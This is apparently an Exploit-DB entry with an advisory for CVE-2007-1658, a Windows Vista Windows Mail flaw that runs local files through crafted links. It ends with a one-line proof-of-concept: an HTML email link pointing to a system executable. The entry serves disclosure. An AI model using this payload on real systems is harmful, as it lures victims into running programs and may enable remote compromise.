Microsoft Windows Vista Windows Mail Local File Execution Vulnerability

2007-03-23T00:00:00
ID EDB-ID:29771
Type exploitdb
Reporter kingcope
Modified 2007-03-23T00:00:00

Description

Microsoft Windows Vista Windows Mail Local File Execution Vulnerability. CVE-2007-1658 . Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/23103/info

Microsoft Windows Vista Windows Mail is prone to a local file-execution vulnerability due to a design error.

An attackers may exploit this issue to execute local files. The attacker must entice a victim into opening a maliciously crafted link using the affected application.

The vendor reports this issue can also be exploited through use of UNC navigation to execute arbitrary remote code. This may facilitate a remote compromise of the affected computer. 

Content-Type: text/html\r\n\r\n<a href=\"c:/windows/system32/winrm?\">Click here!</a>